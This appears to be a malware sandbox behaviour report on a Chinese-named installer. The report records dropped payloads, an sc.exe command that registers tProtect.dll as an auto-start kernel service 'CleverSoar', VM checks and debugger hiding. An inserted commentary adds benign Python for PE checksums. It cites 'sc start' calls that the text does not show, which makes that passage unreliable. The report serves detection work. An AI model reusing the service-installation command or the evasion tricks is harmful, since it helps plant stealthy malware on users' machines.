Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static file information: File size 7495744 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2169234402.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2169131101.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_008457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_008457D0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x343ce5
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.2.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343ce5
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: real checksum: 0x0 should be: 0x72e436
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
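The "real checksum ... should be" entries compare the CheckSum field of each file's optional header with the value a linker would have stored. A zero checksum on the Inno Setup installer, its .tmp stub and the dropped update.vac/hrsw.vbc payloads is unremarkable on its own, because the Windows loader does not validate the field for ordinary user-mode images. The mismatch on tProtect.dll deserves a closer look: Microsoft's PE/COFF specification states that the checksum is validated for drivers, and that file is the one registered as a kernel service above (the report records the repeated `sc start CleverSoar` calls but not their return codes, so it does not say whether the driver ever loaded). The Python below is an added example of the documented algorithm, written for this page and not taken from Joe Sandbox or from any tool the sample bundles: a 16-bit one's-complement sum over the image with end-around carry, skipping the four bytes of the CheckSum field, plus the file length. `build_minimal_image` constructs a toy header with just the fields the routine needs; it is not a loadable PE and its values are invented for the demonstration.

```python
import struct

# Offset of the CheckSum field inside the PE header: 4-byte signature + 20-byte
# file header + 64 bytes into the optional header (same for PE32 and PE32+).
CHECKSUM_OFFSET_IN_PE_HEADER = 4 + 20 + 64


def checksum_field_offset(data: bytes) -> int:
    """Locate the CheckSum field via e_lfanew in the DOS header."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + CHECKSUM_OFFSET_IN_PE_HEADER


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def pe_checksum(data: bytes) -> int:
    """Compute the PE checksum the way the PE/COFF specification describes it."""
    cs_off = checksum_field_offset(data)
    padded = data + (b"\0" if len(data) % 2 else b"")
    total = 0
    for off in range(0, len(padded), 2):
        if cs_off <= off < cs_off + 4:     # the field itself is not summed
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(data)            # original length, not the padded one


def verify(data: bytes) -> tuple[int, int, bool]:
    """Return (stored, computed, match) for an image blob."""
    stored = stored_checksum(data)
    computed = pe_checksum(data)
    return stored, computed, stored == computed


def build_minimal_image(stored: int, size: int = 0x100, fill: int = 0x00) -> bytes:
    """Toy image for the demonstration: DOS header with e_lfanew=0x40, PE signature,
    and a CheckSum field holding `stored`. Every other byte is `fill`.
    This is constructed test data, not a real or loadable PE file."""
    img = bytearray([fill]) * size
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", img, 0x40 + CHECKSUM_OFFSET_IN_PE_HEADER, stored)
    return bytes(img)


if __name__ == "__main__":
    import sys
    # With a path argument, report on a real file the way the sandbox line does.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_image(0)
    stored, computed, ok = verify(blob)
    print(f"real checksum: {stored:#x} should be: {computed:#x} ({'match' if ok else 'mismatch'})")
```

Running it against a file prints the same "real checksum ... should be" pair the report shows. Because 0xFFFF is the one's-complement zero, padding an image with 0xFF bytes does not change the sum, which is why the test below expects the same value for a zero-filled and an 0xFF-filled toy image.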
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.2.dr | Static PE information: section name: .00cfg
Source: update.vac.2.dr | Static PE information: section name: .voltbl
Source: update.vac.2.dr | Static PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .8Tk
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC586EB push ecx; ret 6_2_6CC586FE
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CB00F00 push ss; retn 0001h 6_2_6CB00F0A
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CD26F10 push eax; ret 6_2_6CD26F2E
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC8B9F4 push 004AC35Ch; ret 6_2_6CC8BA0E
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CD27290 push eax; ret 6_2_6CD272BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007C45F4 push 0086C35Ch; ret 10_2_007C460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0085FB10 push eax; ret 10_2_0085FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0085FE90 push eax; ret 10_2_0085FEBE
Source: update.vac.2.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.6.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.6.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\update.vac
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (reported 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (reported 3 times)
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process information set: FAILCRITICALERRORS|NOOPENFILEERRORBOX (reported 2 times)
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process information set: FAILCRITICALERRORS|NOOPENFILEERRORBOX (reported 6 times)
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (reported 97 times)
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process information set: FAILCRITICALERRORS|NOOPENFILEERRORBOX (reported 10 times)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported 2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6323
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3351
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Window / User API: threadDelayed 595
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Window / User API: threadDelayed 650
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Window / User API: threadDelayed 561
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (reported 2 times)
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (reported 2 times)
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (reported 2 times)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (reported 32 times)
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC4AEC0 FindFirstFileA,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007C9C60 GetSystemInfo
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000002.2138341068.00000000015DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CAD3886 NtSetInformationThread 00000000,00000011,00000000,00000000 (information class 0x11 is ThreadHideFromDebugger)
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Thread information set: HideFromDebugger (reported 2 times)
